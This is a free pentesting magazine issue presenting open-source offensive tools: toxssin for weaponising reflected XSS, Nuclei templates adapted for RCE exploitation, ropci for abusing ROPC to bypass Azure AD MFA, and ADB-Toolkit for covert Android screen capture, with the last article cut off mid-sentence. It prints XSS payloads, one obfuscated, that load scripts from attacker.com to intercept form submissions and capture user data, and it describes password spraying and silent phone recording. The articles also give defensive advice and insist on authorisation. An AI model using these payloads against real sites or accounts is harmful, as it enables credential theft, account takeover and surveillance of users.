Pentesting Magazine - 2022-05 - Open-Source Pentesting Toolkit
Pentesting Magazine - 2022-05 - Open-Source Pentesting Toolkit
Editors: www.hakin9.org
Bartek Adach
[email protected]
All trademarks, trade names, or logos mentioned or used are the property of
Agata Staszelis their respective owners. The techniques described in our articles may only
[email protected] be used in private, local networks. The editors hold no responsibility for
misuse of the presented techniques or consequent data loss.
Bruno Zwierz
[email protected]
Proofreader:
Lee McKenzie
Senior Consultant/Publisher:
Paweł Marciniak
CEO:
Joanna Kretowicz
[email protected]
Marketing Director:
Joanna Kretowicz
[email protected]
DTP:
Bruno Zwierz
[email protected]
Cover Design:
Joanna Kretowicz
Dear PenTest Readers,
This open edition takes a special place in our hearts. Here, at PenTest Magazine, we deeply care about
the community and knowledge-sharing. The edition you are reading right now reflects that.
Inside this free issue you’ll find articles featuring open source tools for pentesters. Many of them are
written by the authors themselves - don’t forget to check their GitHub profile afterwards! We wanted to
cover a broad spectrum of tools, ranging from useful scripts and Linux distributions to innovative tools.
Grab your favorite hot beverage (or something cold, we don’t forget about you, Southern Hemisphere!),
find a comfortable position and learn something new about pentesting Android devices, how to
weaponize reflected XSS, scan for vulnerabilities using Nuclei, get to know ropci and much more!
Please, don’t hesitate to contribute to the tools whenever you find room for improvement. Without a
doubt this is the most powerful part of the open source community - you truly can make a difference.
2
Contents
Weaponizing Reflected XSS
Panagiotis Chartas 4
ADB-Toolkit
Ashwini Sahu 32
@edoardottt's tools
Edoardo Ottavineli 46
AthenaOS
Antonio Voza 52
Rekono
Pablo Santiago López 69
AutoPWN Suite
Kaan Gültekin 85
GooFuzz
David Utón Amaya 100
Weaponizing Reflected
XSS
by Panagiotis Chartas
Introduction
Attacks based on social engineering were never really my thing. Don’t get me wrong, there’s nothing I
find more hilarious than a successful phishing campaign that results in multiple, juicy, trick-invoked,
shame bearing reverse shells. But, in the case of exploiting Reflected XSS (Cross-Site Scripting), which
is considered a lame, low-level vulnerability, I always thought it’s just not worth it and here’s the main
reasons why:
• The victim must be tricked into following a malicious URL (e.g., via a phishing campaign or a
personalized message),
• There are many exploitation obstacles. Browsers have built-in controls against it (analyzed later), not
to mention WAFs and security checks implemented by developers,
• It has an uncertain (usually short) lifespan (if the user navigates away from the vulnerable page or
closes the tab/browser, it’s game over),
• Even if nothing of the above stands in the way, you might not get anything juicy out of it.
Sounds like too much trouble for the level of uncertainty it bears as an attack vector.
Inspiration
Some time ago, I was testing a web application. After a few basic requests, source code inspection and
messing around with the login portal, I noticed that the “username” input’s value (normally a POST
request parameter) is susceptible to Cross-Site Scripting (XSS), as it is reflected, without any form of
sanitization, directly in the “username” input’s “value” attribute, by simply adding it to the URL as a GET
request parameter. Example:
https://victim.com/login.jsp?action=auth&username=yolo
The login page included one more low criticality vulnerability. The outdated library jQuery 1.10.2 which
is subject to CVE-2015-9251 (among other vulnerabilities) was linked to it. I get very excited whenever I
detect outdated jQuery libraries because it means that, if XSS is present, it is most likely possible to
execute external JavaScript files using a very short payload. This is because jQuery, before version
3.0.0, will execute text/JavaScript responses when a cross-domain AJAX request is performed without
the “datatype” option set. For example, the following jQuery AJAX request will instantly execute the
4
response’s body, making it easier to craft malicious URLs that include external JS files and run
sophisticated payloads in the victim’s browser, through social engineering attacks:
I chose to utilize the “onmouseover” event to create a malicious URL payload that would request and
execute an external malicious JS script when the user would hover over the username field. It looked
something like this (URL decoded):
https://victim.com/login.jsp?action=auth&username="
onmouseover="$.ajax({url:'https://attacker.com/hook.js'})
To provide a better perspective, this is what the underlying source code would look like after visiting the
above malicious URL (simplified):
<!DOCTYPE html>
<html>
<body>
<label for="username"><b>Username</b></label>
<label for="password"><b>Password</b></label>
<button type="submit">Login</button>
</form>
</body>
</html>
Although valid, the URL payload resulted in a delayed error response (1 minute+ latency) with message
“Page temporarily not available”. Something (maybe a WAF?) was making exploitation a bit trickier. To
evade it, I transformed each character of the main payload to its equivalent ASCII char number
representation, used the String.fromCharCode() JavaScript function to translate the obfuscated
payload’s bytes into the original string and finally, executed the obfuscated payload-string using the
eval() function. Final payload looked like this (URL decoded):
5
https://victim.com/login.jsp?action=auth&username="
onmouseover="eval(String.fromCharode(36, 46, 97, 106, 97, 120, 40, 123, 117,
114, 108, 58, 39, 104, 116, 116, 112, 115, 58, 47, 47, 97, 116, 116, 97, 99,
107, 101, 114, 46, 99, 111, 109, 47, 104, 111, 111, 107, 46, 106, 115, 39,
125, 41))
I started a Python HTTPS server on my attacker machine and gave it a run, everything was working as
expected. The only thing left now was to create and host the JavaScript payload.
Since the vulnerability existed in the login page, I could host a JS keylogger, forward the malicious URL
to some of the application’s users and hopefully harvest the credentials of anyone attempting to login
with a poisoned browser. As the document’s location would change after submitting the form, the
attack would probably end there. Classic, right? Well, I wasn’t satisfied.
I started fantasizing about capturing secrets sourced from the user’s activity, whether those are files,
typed text, application usage patterns, etc., kind of a spyware-like poison that could also survive
navigation to non-vulnerable locations.
Therefore (I said to myself), you need a JavaScript payload that will identify sensitive components in a
webpage and poison all of them instantly and dynamically, while maintaining persistence and reporting
back to a server (attacker) regarding what the user is doing, e.g., where is he/she navigating, what is
he/she typing, pasting, uploading, viewing, submitting, and getting as a response. And toxssin was
born.
What is toxssin?
toxssin is a penetration testing tool that automates the process of exploiting Cross-Site Scripting (XSS)
vulnerabilities. It consists of an HTTPS server that works as an interpreter for the exfiltrated traffic and
notifications generated by the malicious JavaScript payload that powers the tool (toxin.js).
By default, toxssin’s JavaScript poison automatically spreads across the elements and information of a
webpage, abusing the XMLHttpRequest object to intercept:
• Paste events,
• File selections,
• Form submissions,
6
• Server responses (to form submissions or clicking hyperlinks that target different pages and not
internal parts of the same page),
• Table data (static as well as updates on tables after a page has finished loading).
• Attempts to create XSS persistence while the user browses the website by intercepting HTTP
requests and responses and re-writing the document, creating the illusion of navigating when actually
the document’s location never changes,
• Supports session management (you can use it to exploit multiple targets at the same time, e.g., by
running an XSS-based phishing campaign or exploiting stored XSS),
• Supports custom JS script execution against sessions (after a browser gets hooked, you can run
custom JS scripts against it),
Component Function
A handler script that serves as a wingman for the poison. It is called first to
handler.js determine the session type (new or existing) and inform the server
accordingly. It then proceeds to retrieve and deliver the poison.
7
Here’s a basic preview of a hooked browser, intercepted data, request and responses:
The output of intercepted requests is usually very long as it may include a combination of raw data
(text/binary), HTML, CSS and JavaScript, so, the default mode is to log each intercepted request’s data
in separate files as well as the main log that you see above, for each session.
8
How it works
Since there’s a video demonstration available online, I find it more interesting to describe how a few of
the best features this tool has to offer work.
Here’s how the Requests and Server Responses interception is implemented. I’ve placed a separate
icon for the user, his (poisoned) browser and the JavaScript poison (that is running in the browser) to
better visualize the process, although, all of these three entities are basically one:
The user submits a form or clicks a hyperlink. A request supposedly going to the legitimate webserver
is generated (Green arrow stopped by the red “X”).
Event listeners placed by toxssin’s poison prevent the normal request from completing
(event.preventDefault()). Instead, the request’s data are copied and the XMLHttpRequest object with the
withCredentials option set as true is used to forward a copy of the original request to the attacker’s
server as well as the legitimate server (orange arrows).
The intercepted server response is forwarded to the attacker’s server and then, the server’s response
body is modified so that the </body> closing tag string is replaced with the following:
<script src="https://attacker.com/handler.js"></script></body>
Finally, toxssin replaces the document object’s content with the modified server’s response body. All of
the elements included in the original response (media, scripts, etc.) start loading normally, creating the
illusion of actually browsing the webpage, when basically, the document’s location never changed. The
last element to load in the body is toxssin’s handler, a script that determines the type of session (new or
existing) and acts accordingly to inform the attacker’s server about the event and serve the poison
again, creating XSS persistence (blue arrows).
A table is just like any other html element. In the case of XSS, any payload that spiders a webpage after
it has finished loading and sends a copy back to the attacker, will capture the data contained in tables
9
as well. But what if the user (victim) implements an action that causes the table data to update, e.g.,
click the next page button, use a search or refresh function? It would be a shame to miss the juicy data
that may pop up, right? Don’t worry fellow hackers, toxssin’s got your back.
I figured that the only thing I needed in order to implement a poison-function that will know when a
table’s data have been altered, recapture and forward them back to the attacker’s machine, is a hashing
algorithm (duh). Apparently, (vanilla) JavaScript doesn’t include hash algorithm implementations.
Searching around the web, I came across a 42 lines long, md5 hash algorithm JS implementation,
apparently written by Paul Johnston & Greg Holt, that worked like a charm. Armed with this code block,
I was able to write a function that calculates and marks every table in a web page with its md5
checksum and checks for changes every 1 second or so. When changes are detected, the new table
data is intercepted and forwarded back to the toxssin server (attacker) where it is processed and
logged.
• intercepting and forwarding the full page’s HTML source code back to the attacker,
• intercepting table elements only, sending their source code back to the attacker and calculating the
checksum to determine if a table has changed server-side.
An approach like that would cause a lot of heavy traffic generated by the victim’s browser. So, I decided
to go with the, in my opinion, more elegant (although a bit computationally heavy, one might say)
approach of adding an attribute “_digest” with the md5 checksum as value to each table, making it
possible to determine when a table’s content has been altered and recapture it.
Obstacles
Here are, in my experience, the major obstacles of exploiting XSS by including external JS scripts and
how toxssin is dealing with them:
10
The "Mixed Content" error, which occurs when both HTTP and HTTPS assets are being loaded from a
web page that was requested to be fetched as HTTPS and can be resolved by serving the malicious
JavaScript payload via HTTPS, even with a self-signed certificate, although unreliable, as it leads to
major obstacle #2 below).
A Content-Security-Policy header with the script-src set to specific domain(s) will block scripts
with cross-domain source from loading, making it (in my opinion) the greatest control against this type
of attack. In addition to that, toxssin relies on the eval() JS function to deliver its poison, so, if the
website has a CSP and the unsafe-eval source expression is not specified in the script-src directive, the
attack will most likely fail.
Epilogue
These, I believe, are the most interesting components of toxssin’s JS poison and general capabilities.
Wrapping up, it is worth mentioning that, although this article focuses on how a reflected XSS can be
turned into a serious attack vector, you can use this tool to exploit stored XSS as well.
An even more dangerous scenario: If an attacker obtains a low privilege shell (e.g., as www-data) on a
web server and is able to append (or escalate enough to append) code to the server’s web pages, it
would be possible to include a script with src being toxssin’s handler (linked internally or externally) and
proceed to harvest poisoned browser sessions indefinitely, spying and intercepting on people’s data
and actions.
Long story short… Developers and System Administrators, for the love of God, add a Content Security
Policy to your Web Server!!!
11
Nuclei Vulnerability
Scanning in 2022... Or even
Vulnerability scanning is one of the most vilified and one of the most deified activities in the world of
security testing (call it whatever you want: pentest, ethical hacking, vulnerability scanning, BUT not red
teaming! Please, don't!).
There are many reasons for this, but let's mention just two that are a consequence of each other. Since
a lot of "pentests" are sold that are just automated vulnerability scanning and the results are presented
just as the scanning tools report them, there is a tendency to underestimate and even minimize its value
in security testing.
The truth is that it is not only valuable for the organizations themselves to continuously and constantly
perform vulnerability scans to know how their technology security is doing, it is also required by
standards such as PCI DSS and is mandatory/inevitable during a pentest.
There are a large number of vulnerability scanners at infrastructure and application level with different
ways of doing it and integrating with other tools, and they are even sold as SaaS. Prices and licensing
models vary and, despite this being somewhat "commercial", the fact is that no matter how good the
tool is, if the price/licensing is expensive/complex/prohibitive, we have to look for other options that do
not make "cheap is expensive" a real situation.
If we leave aside the commercial issue (of course, we have all the budget in the universe, price/
licensing is irrelevant!), anyone who has been using vulnerability scanners for a while looks eagerly for
ways to expand or customize the plugins/scripts that are the ones that actually detect and hopefully
confirm and get evidence of the vulnerability.
It’s not a secret that Nessus is the most used scanner and it’s almost certain that you can already
execute just an NASL script from the command line in order to confirm a vulnerability with some
modification or to just turn the detection script into a full exploit.
However, many of these plugins have been in a binary format for several years now, and this makes it
impossible to take advantage of them properly.
12
This is when you might start to look at other options and OpenVAS arises, which is complicated in
every sense; it is not so "free" now and, on top of that, it is not very accurate in its results.
What's the point of all that long introduction? To define what a pentester looks for in a vulnerability
scanner and why Nuclei is one of the best options to follow:
• It must not add another new scripting language to my notes (those who say they know several
languages without looking at the notes or googling are lying).
Nuclei is a tool developed in GO for templates-based scanning built using YAML (actually, it is a DSL
using YAML. What is a DSL? Does SQL sound familiar to you? It is a well-known example of a DSL). It
is a project that the company ProjectDiscovery started in its initiative to generate automated tools that
help in the management of attack surfaces (other projects that they started are subfinder, httpx, etc.).
Nuclei is used to send messages (requests for HTTP and frames for other types of services) using
templates that allow it to process the responses and find matches based on various conditions. In this
way, it minimizes false positives and provides a way to quickly scan multiple test targets (the latter is
stated in its repo and I can confirm that).
As you can see from the previous paragraph, the power of Nuclei is in the templates and that is where
the flexibility to correct/enhance/improve, customize and exploit lies.
It is important to point out, at this point, that at the beginning it was a scanner recommended to find the
classic "low hanging fruits". From that time to the present, a lot has happened.
For the details of installation, use and basic manipulation of templates, the site https://
nuclei.projectdiscovery.io/ has very good help, but entering the template repo helps a lot when you
need to do something from intermediate to advanced.
As can be seen in the image below, an online report is presented that can be saved and indicates the
risk level of identified vulnerabilities. You can also save a log of each interaction performed to check
each vulnerability it reports.
13
Beyond the detection of vulnerabilities using existing templates, there are situations where the
pentester detects and confirms a vulnerability based on a banner and googling. This is perfect for
analyzing the possibility of automating the next vulnerability scan without having to go through the
manual process again. It is also interesting to see what can be contributed to the project by proposing
corrections and improvements to existing templates.
Even in the extreme, Nuclei allows changes that help to exploit the detected vulnerabilities. A practical
case is when Nuclei detects a vulnerability and the review of the details leads us to see that it can be
exploited, but we do not have the means (a script that automates, an exploit, a "one-liner", etc.) and we
look for a simple way to exploit it: Nuclei to the rescue!
To add something more, we know that sometimes the result of, for example, an HTTP request cannot
be observed with the attack data itself (in-band) and the results can be obtained out-of-band (OOB) by
means of certain interactions. Burp Professional has the Collaborator, but there is another open source
solution called "interact.sh" that is integrated with Nuclei as a free service.
Let's take as an example the template that checks the existence of a vulnerability in Confluence that
has the code CVE-2021-26084 referred to an RCE and for which Nuclei already has a template that
only sends a request with a specific encoded string and checks that it appears in the response along
with the result of an arithmetic operation (wasn't it RCE?) without making use of interact.sh. The first
approach to have a different result is to perform the external interaction (which serves to check how
much control there is over the outgoing connections as well).
The image below shows the modified version. It is quite simple in the sense that only the execution of a
command (curl) is performed using the interact.sh marker and it is evaluated if, in the response, an
interaction via HTTP was obtained (other compliance conditions can be tested).
14
That's the basics of RCE: You can't extract information, only check that it executes commands, but you
don't see the results of those commands.
To have a better result, you must deploy your own server (attacker) and modify the tool (the template
specifically) to do more than the basics.
The benefits of doing this small effort are that you will get concrete evidence, preparation for the
integration of other steps (chain of vulnerabilities) and integration into DevSecOps environments.
Then, we run a web server that supports a form of upload (enabling the PUT method may be the
easiest) as shown in the image below.
Then we modify the template in such a way that we put a "payload" in the sequence of commands that
we want to execute. For each one of them, a file will be generated and then uploaded to our server.
Each of these files will have the result of the execution of each command.
15
That way, we went from having a vulnerability scanner report to exploiting one of the vulnerabilities it
detected without writing the code itself, just making use of YAML.
There is much more with Nuclei because it can do headless functions to automate browser actions,
handle flows, preprocessing and more.
16
ropci
So, you think you have MFA?
by Johann Rehberger
This article discusses ropci, which is a tool that aids with identifying and abusing OAuth2 ROPC
exposed applications in Microsoft AAD. In particular, the article explores what ROPC is, how to test for
it, how to abuse ROPC enabled applications during security assessments and pen tests, as well as
mitigation steps.
The author has helped identify multiple production AAD tenants, where AAD customers believed they
had MFA enabled, but ROPC based authentication succeeded. The root causes stem from convoluted,
but not uncommon, setups and misconfigurations, including scenarios such as federated auth, pass
through authentication, native AAD accounts vs on-prem accounts, as well as the various (at times
confusing) options in the user interface to configure MFA settings depending on the SKU used.
What is ROPC?
Resource Owner Password Credentials (ROPC) is an OAuth2 “flow” defined in RFC 6749. This auth
flow leverages old school username and password to retrieve an access token from a token server.
This means that the client application must process the user’s credentials, which is something that
OAuth2 was kind of invented to prevent. The main reason it seems to exist according to the RFC is to
support a migration from legacy applications to OAuth2.
OAuth 2.0 Security Best Current Practice highlights that “The resource owner password credentials
grant MUST NOT be used”, and Microsoft in their documentation writes that:
So, the take-away seems to be that no-one should be using ROPC anymore these days.
However, ROPC is enabled for many OAuth2 applications by default in Azure Active Directory.
If you have an AAD tenant, you have ROPC exposure and should test for it to make sure there are
no misconfigurations or insecure defaults that are being configured when it comes to MFA.
17
One thing to be aware of is that AAD contains the “CA003: Block legacy authentication” Conditional
Access Policy template, but that will not block ROPC.
In addition to the default Microsoft ROPC apps, customers frequently add custom applications (so
called Enterprise App Registrations) to their tenant that might have ROPC enabled.
If an adversary can exploit ROPC due to MFA not being explicitly enforced on an account, it can be
used to gain access to information in your AAD tenant, including:
• Enumerate all other OAuth apps (called Service Principals in AAD terminology)
• Other APIs including, but not limited to, Microsoft Graph API
There has been an uptick in tooling and attacks in this space, so it’s important to test for ROPC issues.
ROPC usage is pretty straight forward to spot or test for. The OAuth POST request to the token
endpoint will contain grant_type=password.
This grant type does indicate the Resource Owner Password Credentials flow.
Host: login.microsoftonline.com
Content-Length: 137
Content-Type: application/x-www-form-urlencoded
grant_type=password&username=alice@{tenant}.com&password=ThisIsFine
&client_id=5d661950-3475-41cd-a2c3-
d671a3162bc1&scope=openid%20offline_access
18
If ROPC is enabled for the application (with the given client_id), and the tenant doesn’t block single-
factor authentication (SFA) for the account explicitly, e.g. via Conditional Access Policies that enforce
MFA, this POST request will return an access token, refresh token and also an id token as seen
below:
HTTP/1.1 200 OK
Content-Length: 4307
"token_type":"Bearer",
"access_token":"eyJ0e....SOEwM5DrmOVOl0k5AMAKjcohxkenT-fTYTP7NjViiOg",
"refresh_token":"0.AVAAtjkjOuyd6U-HMgmzuyXiBFAZZl…",
"id_token":"eyJ0eXAiOiJKV1QiLCJhbGciOi…",
"scope":"email openid profile AuditLog.Create Chat.Read
DataLossPreventionPolicy.Evaluate Directory.Read.All EduRoster.ReadBasic
Files.ReadWrite.All Group.ReadWrite.All InformationProtectionPolicy.Read
OnlineMeetings.Read People.Read SensitiveInfoType.Detect
SensitiveInfoType.Read.All SensitivityLabel.Evaluate User.Invite.All
User.Read User.ReadBasic.All",
"expires_in":4268,
"ext_expires_in":4268
Using these tokens, an adversary can start calling other Microsoft APIs.
The Azure Sign-In logs also show when ROPC logins occur; the authentication type to look for is
“ROPC”.
From an offensive security perspective there are a couple of test scenarios that are important to
evaluate. One tool that can be used to test and exploit ROPC issues is ropci.
Introducing ropci
To aid with testing for ROPC, you can download ropci from Github at: https://github.com/
wunderwuzzi23/ropci.
Ropci is written in Golang, and can be compiled to Windows, Linux and macOS. The Github repository
contains source code, as well as pre-compiled binaries for download.
19
Every command has help support to see what options are supported. But to get started with testing,
let’s see if we can authenticate.
To perform a basic and quick test, which you should do to see if your company has some bigger AAD
MFA misconfiguration, run:
where you replace the info in brackets with your own testing information, as in this screenshot:
The above screenshot shows the most basic auth test. If authentication succeeds, the retrieved scopes
will be shown. If it fails, you will see the detailed AAD error message.
You can also provide a different client_id on the command line if you want other scopes.
IMPORTANT
If you get an access token this way, it is enough evidence to reach out to your IT department to
discuss ROPC! Things will only get worse from here on... The AAD tenant is not as secure as it
could or should be, as single-factor authentication via ROPC is possible.
Configuration
Besides a quick ad-hoc test, you can configure ropci to not have to enter information each time. The
default configuration is stored in the file .ropci.yaml; it contains basic information such as tenant,
username, password, client_id to use.
To create a config file, you can just type: ./ropci configure and enter the information you want to use:
20
Feel free to review the newly created .ropci.yaml file to see the configuration details.
Authenticating
Now you can attempt to logon using ROPC via ./ropci auth logon:
If authentication is successful, the access token, refresh token and id token, as well as granted scopes
will be written to the file .token.
Below is an example of ropci’s .token file, and you can see the scopes that were granted that way:
In some cases that we will show later, ropci will automatically switch the client_id under the hoods to
authenticated to get the needed scopes for operations (e.g., when sending mail with./ropci mail send).
There are different kinds of applications in AAD, and we don’t have time to discuss them in detail, but
it’s typical that an app has delegated permission, which means the account whose username/password
was provided still needs to have the proper access rights as well. Meaning, you can’t read someone
else’s mailbox, unless the account used has the permission to read mail from other users, but the
account can read its own email.
21
Other authentication options - devicecode
Even though we are focused on ROPC authentication, you can also leverage devicecode
authentication to retrieve an access code. This is useful if you’d like to use ropci for its other features.
To get an access token via the devicecode flow run: $ ./ropci auth devicecode and follow instructions.
Refreshing tokens
If you have a refresh token cached in the .token file, just type ./ropci auth refresh to refresh it. Ropci
will do that automatically under the covers if the token is about to expire. You can also leverage tokens
from other tools this way (more in the help with ropci auth refresh help).
Invalidating tokens
You can also invalidate the token by simple typing ./ropci auth invalidate.
Using ropci
For this tutorial, let’s first explore the apps command, which allows you to list all OAuth applications in
use by the tenant (Microsoft calls these service principals, by the way, and the OAuth client_id is called
appId).
22
You can enumerate them with ./ropci apps list:
By default, only 100 entries are listed, if there are more you can provide –all to see them all.
There is also a –format json option to dump all the information to json, which we will do to perform a
bulk assessment against all client_id to see if we can get tokens via ROPC.
To parse the json based output we get with the above command, I like using jq, for instance:
$ jq -r '.value[].appId' apps.list | wc -l
Quite a lot. Let’s do a bulk test for ROPC auth to see which ones are configured for ROPC and what
scopes/permissions we get!
Use the following one liner to query the tenant and get a csv file that can be used with the ./ropci auth
bulk command:
23
$ ./ropci apps list --all --format json | jq -r '.value[] |
[.displayName,.appId] | @csv' > apps.csv
This will create a csv file that can be used with the `auth bulk` command.
Additionally, there are clientids that are available in all tenants, but are not listed.
These are applications AAD makes available to everyone. I aggregated them from various sources
(such as AADInternals, and other tools) and performed a bulk auth check with ropci. That way we can
find 59 applications that support ROPC and will be present in pretty much every AAD tenant.
Here is a screenshot of the list showing the scopes for these “built-in” apps:
24
To repro this, you can use the “clientids” file in the ropci Github project (at https://github.com/
wunderwuzzi23/ropci/blob/v0.1/clientids) and perform a bulk authentication for all of them.
Another interesting feature of ropci is the ability to perform a password spray across accounts and
configure timeouts for the test.
Ropci will go over each password in the password’s file, and then try the passwords for each user in
the user’s file. With –wait and –wait-try the spray can be configured to wait after passwords round, or
also after everyone tries. This allows you to do low and slow sprays to test for detections.
IMPORTANT: Password spraying can lead to account lockouts. Hence, make sure that for any kind of
password brute force or spray, you have proper permission from the right stakeholders and that
potential implications/policies are understood upfront. Always understand what you are doing.
Users and Group commands can retrieve information about the current user and group memberships.
This is done with the following command:
25
$ ./ropci users who
It will list information about the current user, including ownership and membership of groups and roles.
You can also provide the -u argument to explore details of a specific other user account:
To dump all account information at scale, use the list method, and to dump results as json format, use:
Searching
To explore users or groups more interactively, you can use the search option -s:
26
There are many other features to list members and owners of groups, for instance, adding/removing
users/groups, or to set a user’s password. Feel free to explore users and groups methods more.
Another important feature is the ability to read and be able to send email via ROPC. This can be done
with ./ropci mail list and ./ropci mail send.
If you want to see more content or preview of the emails, you can leverage --all --format json to dump
the details.
Sending emails
Sending emails does require a different client_id, and ropci will request it automatically. Ropci uses the
client_id 57336123-6e14-4acc-8dcf-287b6088aa28, which is the Microsoft Whiteboard Client. Turns
out it has the permission Mail.Send.
Sending an email requires a template to be leveraged, which contains the content, recipients,
attachments, etc., of the email to be sent. Here is an example template file:
27
And this is how it looks in action:
Please note how ropci requested a new access token and stored it in .token-mailsend. This is the
token for the Microsoft Whiteboard Client app, and it can send mail as the user.
A cool feature is to search through the email of an account via ./ropci search. Using search, it’s
possible to quickly look through the email of the user. The following is an example:
As you can see, the search found some emails that contain the search keyword!
28
There is a lot more!
Each ropci command has a wide list of sub-commands, and there are commands for azure and drive
that you can explore also.
With drive, it’s possible to list, download and upload files to SharePoint, for instance!
If you are interested in exploring other Graph API methods, you can use the call method also, which
allows constructing your own Graph API requests for methods that are not yet implemented with ropci.
With the following command, you can see available method names:
Another feature, with basic functionality, is the azure module. If MFA is not enforced, one might be able
to read Azure subscriptions, and VMs the user has access to using ./ropci azure:
In case the account has proper privileges, it’s possible to directly send a command to a VM. To try that,
use the ./ropci azure vm-runcmd feature. Pretty neat!
29
Let’s summarize the most important tests you should try as a pen tester. From experience, the following
test cases seem important to validate that an AAD tenant is securely configured.
Test your own tenant for these attacks to make sure an adversary can't exploit them:
• The following three scenarios are often fruitful to identify MFA misconfigurations:
• AAD accounts – Native AAD accounts might be an afterthought (in case of federation/SSO, etc.)
• $ ./ropci auth bulk: Test all apps, and review results and granted scopes
Afterwards, review to see if there are any unexpected applications that have ROPC exposed and try to
lock them down accordingly.
• Always explicitly enforce MFA! This sounds easy, but apparently, it seems to be a challenge to
implement given the amount and kind of bypasses I have seen with production AAD tenants.
• If you paid for Azure Premium, leverage Conditional Access Policies to enforce MFA.
• Security defaults might not adequately protect user accounts. In some of my testing, I switched IP
addresses multiple times to various countries (impossible travel) and single-factor ROPC
authentication continued to succeed. It’s best to explicitly enforce MFA for all accounts.
• Hybrid and federated MFA enforcement can leave "native" AAD accounts vulnerable.
• Some scenarios might remain vulnerable to single factor authentication. The exposure should be
known, and a conscious decision (risk acceptance).
• Know your weaknesses, monitor exposure, and continue locking down settings.
• Test and validate your configurations from an offensive security point of view!
And remember, as always, pentesting requires authorization from proper stakeholders beforehand.
30
Happy Hacking!
• A b u s i n g F a m i l y R e f r e s h To k e n s b y S e c u r e W o r k s :
https://github.com/secureworks/family-of-client-ids-research
• Hackers are using this sneaky exploit to bypass Microsoft's MFA: https://www.zdnet.com/article/
hackers-are-using-this-sneaky-trick-to-exploit-dormant-microsoft-cloud-accounts-and-bypass-multi-
factor-authentication/
31
ADB-Toolkit
ADB Wrapper for your Android Device, Helpful yet Deadly.
by Ashwini Sahu
In this article:
• We will examine the attack scenario where your Android device can be compromised.
• We will use a tool named ADB-Toolkit. We will perform some demos and look into various options
provided by the ADB-Toolkit and perform a demo of installing and setting up the ADB-Toolkit and
then wirelessly recording a victim phone anonymously without any APK or any other software. We’ll
also take a look into the Metasploit section of the ADB-Toolkit.
• Initialize a system shell of the Android device in the host machine wirelessly.
• Will look at the general use case of the ADB-Toolkit, and how you can transfer files at a significantly
better speed than using the traditional MTP wired or wirelessly.
• Also, go through some checks and best practices for securing your Android device.
Before starting, I would like to give a special shoutout to Ms. Pallavi Das aka KiddoByte for her help in
testing the features on multiple devices.
Introduction
Android - we all have heard about this piece of software if you’ve been alive since 2008. Android is one
of the most famous and used mobile operating systems based on a modified version of the Linux
Kernel. As of 2022, Android is the most popular operating system in the entire planet with over 2.5
Billion active users spanning over 190 countries covering over 70 percent of mobile OS industry and
remaining 30 percent is covered by Apple’s iOS.
Thus, it makes the 70 percent population who entertain Android vulnerable to the most thriving and
largest number of malware ever made for an operating system. Android gets 97 percent of all malware,
consisting of Trojans, adware, spyware, backdoors, and other kinds of malware.
32
We’ll also talk about how to take care of your Android and which setting switch you must turn off if you
don’t know what it’s for.
So, talking about ADB-Toolkit, it’s a wrapper to ADB that stands for Android Debug Bridge. ADB is a
utility that lets us communicate with an Android Device and that utility mixed with the bare shell of your
Android device makes this tool so powerful and useful for both a pentest scenario or day to day usage.
ADB-Toolkit is a script purely written in Bash with 28 options and a Metasploit section that is used for
a Metasploit type of attack by creating a payload to start the Metasploit listener and installing the
payload to the victim device and general stuff like installing an .apk file or data pulling or pushing from
or into the system.
Before installing and testing the ADB-Toolkit, if you also want to follow, you must do the prerequisite
with your setup as explained below:
We have to enable USB Debugging in your Android device to get started and that is the mandatory
part.
33
How to enable USB Debugging:
34
5. Turn on the USB debugging
Installation
Step 1: Cloning the ADB-Toolkit Git repository for the latest source code.
35
Upon successful installation, you will see this message:
When the installation part is finished, you can confirm the successful installation by running the
command below:
Procedure in brief: What we are going to do is record the screen of an Android and for that, we will
need to connect the device to the host machine in which the ADB-Toolkit is installed and then there are
2 modes of the connection.
1. Wired Mode
2. Wireless Mode
In wireless mode, the Android device and the host machine need to be in the same network. For
example, both devices are to be connected to the same network if the phone is connected to the
network via Wi-Fi or by any means, you must be able to ping the Android device from the host
machine.
After that, we will one time connect the Android device to the host machine for the establishment of a
remote connection, then we can perform various tasks.
Prerequisite: Catch the earlier topic “Preparing Your Android Device” and set up the tool.
Step 1: Connect your Android Device to the host machine and if the phone prompts some dialog for
confirmation click yes or allow.
Step 2: Change the directory to where you have cloned the ADB-Toolkit.
36
Step 3: Execute the script by running the command “sudo ./ADB-Toolkit” and choose Y/N whether to
restart the ADB server or not, it is recommended to not restart the server if you are already connected
to a client and just open another instance of ADB-Toolkit.
Step 4: Verify and check if the Android device is properly connected or not, by clicking on the 1st
option that is “Show Connected Devices”.
For more details, you can use option 10, which is “Get Phone Details”.
It will provide you with various pieces of information like your Model, Code Wifi interface, encrypted or
not, your Android Version, the Latest Security Patch, or any other important information for further
reconnaissance, or you can check the full details of the device if you click Y in the prompt.
37
Step 5: Click on option 16, which is “Establish Remote Connect”, this option will extract the IP Address
from your Android device and try to establish a remote connection with the host machine and after the
successful operation, you can unplug the device.
You can launch the shell of your Android device by clicking Y but for this demo, we will do N.
It will start the recording of your Android device and to stop the recording, you have to press the enter
key as shown on the screen. The screenrecord will be stored in the directory named “Screenrecord”
and you can view that video by going to that directory.
38
So you learned how to use the ADB-Toolkit and, via that, how to remotely record the screen
anonymously
Note: Please don’t use this with the wrong intention - use this for learning purposes only.
Simultaneously, you can use option 17, which is “Capture A Screenshot Anonymously”.
This will take a screenshot of your Android device and save it to the “Screenshot” directory for you to
see; it’s very simple to operate and has a very easy UI.
Aim: Start the system shell of your Android device in interactive mode.
Procedure in brief: What we are going to do is start a shell of your Android system in your host
machine, thus you can execute shell commands in the host machine terminal of your Android device.
You can also achieve this in two ways like the previous demo.
1. Wired Mode
2. Wireless Mode
Note: So if you want to do it in the Wireless mode, follow the previous demo up to Step 5; doing so will
create a remote connection to your Android Device with this host machine.
Prerequisite: Catch the earlier topic “Preparing Your Android Device” and set up the tool, and for
wireless mode follow the previous demo up to step 5.
Step 1: Connect your Android Device to the host machine and if the phone prompts some dialog for
confirmation, click yes or allow.
39
Step 2: Change the directory to where you have cloned the ADB-Toolkit.
Step 3: Execute the script by running the command “sudo ./ADB-Toolkit” and choose Y/N whether to
restart the ADB server or not. It is recommended to not restart the server if you are already connected
to a client and just open another instance of ADB-Toolkit.
Step 4: Verify and check if the Android device is properly connected or not, by clicking on the 1st
option that is “Show Connected Devices”.
This will start an interactive shell in your terminal and a Unix-like shell will open so that you can do
